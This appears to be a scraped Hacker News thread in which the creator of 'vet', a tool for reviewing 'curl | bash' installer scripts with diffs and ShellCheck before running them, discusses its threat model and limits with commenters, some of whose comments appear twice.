My main question is in 90% of cases these are installers. How are you actually verifying the software that you install? In some cases it is signed and verified but in many cases it is just coming down from the same HTTPS server with no additional verification. So are you then diffing the code (which may be compiled) as well?
I'm not saying that random running random installers from the internet is a great pattern. Something like installing from your distribution can have better verification mechanisms. But this seems to add very little confidence.
a10r · 4h ago
You're absolutely right—vet's scope is focused on securing the installer script itself, not the binary it downloads.
The goal is to prevent the installer from being maliciously modified to, for example, skip its own checksum verification or download a binary from a different, malicious URL.
It's one strong link in the chain, but you're right that it's not the whole chain.
No comments yet
thealistra · 3h ago
Can you show how it works on the page or readme as a video?
Does it open pager or editor? How does it show the shellcheck issues.
gardnr · 4h ago
This is a great idea!
One extra feature could be passing the contents of the shell script to an LLM and asking it to surface any security concerns.
alganet · 3h ago
What if someone peppers their malicious script with `# shellcheck disable=` pragmas?
3abiton · 3h ago
This an amazing solution. I wondered about this often, looking at you `uv`, but in a lot of the cases I cave given that everyone else trust some code maintainers.
a10r · 4h ago
Love the idea!
The two biggest hurdles for a security tool like this are LLM non-determinism and the major privacy risk of sending code to a third-party API.
This is exactly why vet relies on ShellCheck—it's deterministic, rules-based, and runs completely offline. It will always give the same, trustworthy output for the same input.
But your vision of smarter analysis is absolutely the right direction to be thinking. I'm excited for a future where fast, local AI models can make that a reality for vet. Great food for thought!
No comments yet
a10r · 5h ago
Hi HN, I'm the creator of `vet`. I've always been a bit nervous about the `curl | bash` pattern, even for trusted projects. It feels like there's a missing safety step. I wanted a tool that would show me a diff if a script changed, run it through `shellcheck`, and ask for my explicit OK before executing. That's why I built `vet`.
The install process itself uses this philosophy - I encourage you to check the installer script before running it!
I'm glad to see that I'm not the only person worried about this. It's a pretty glaring bit of attack surface if you ask me. I chuckled when I saw you used nvm as an example in your readme. I've pestered nvm about this sort of thing in the past (https://github.com/nvm-sh/nvm/issues/3349).
I'm a little uncertain about your threat model though. If you've got an SSL-tampering adversary that can serve you a malicious script when you expected the original, don't you think they'd also be sophisticated enough to instead cause the authentic script to subsequently download a malicious payload?
I know that nobody wants to deal with the headaches associated with keeping track of cryptographic hashes for everything you receive over a network (nix is, among other things, a tool for doing this). But I'm afraid it's the only way to actually solve this problem:
1. get remote inputs, check against hashes that were committed to source control
2. make a sandbox that doesn't have internet access
3. do the compute in that sandbox (to ensure it doesn't phone home for a payload which you haven't verified the hash of)
I'm not saying that random running random installers from the internet is a great pattern. Something like installing from your distribution can have better verification mechanisms. But this seems to add very little confidence.
The goal is to prevent the installer from being maliciously modified to, for example, skip its own checksum verification or download a binary from a different, malicious URL.
It's one strong link in the chain, but you're right that it's not the whole chain.
No comments yet
Does it open pager or editor? How does it show the shellcheck issues.
One extra feature could be passing the contents of the shell script to an LLM and asking it to surface any security concerns.
The two biggest hurdles for a security tool like this are LLM non-determinism and the major privacy risk of sending code to a third-party API.
This is exactly why vet relies on ShellCheck—it's deterministic, rules-based, and runs completely offline. It will always give the same, trustworthy output for the same input.
But your vision of smarter analysis is absolutely the right direction to be thinking. I'm excited for a future where fast, local AI models can make that a reality for vet. Great food for thought!
No comments yet
The install process itself uses this philosophy - I encourage you to check the installer script before running it!
I'd love to hear your feedback.
The repo is at https://github.com/vet-run/vet
I'm a little uncertain about your threat model though. If you've got an SSL-tampering adversary that can serve you a malicious script when you expected the original, don't you think they'd also be sophisticated enough to instead cause the authentic script to subsequently download a malicious payload?
I know that nobody wants to deal with the headaches associated with keeping track of cryptographic hashes for everything you receive over a network (nix is, among other things, a tool for doing this). But I'm afraid it's the only way to actually solve this problem:
1. get remote inputs, check against hashes that were committed to source control
2. make a sandbox that doesn't have internet access
3. do the compute in that sandbox (to ensure it doesn't phone home for a payload which you haven't verified the hash of)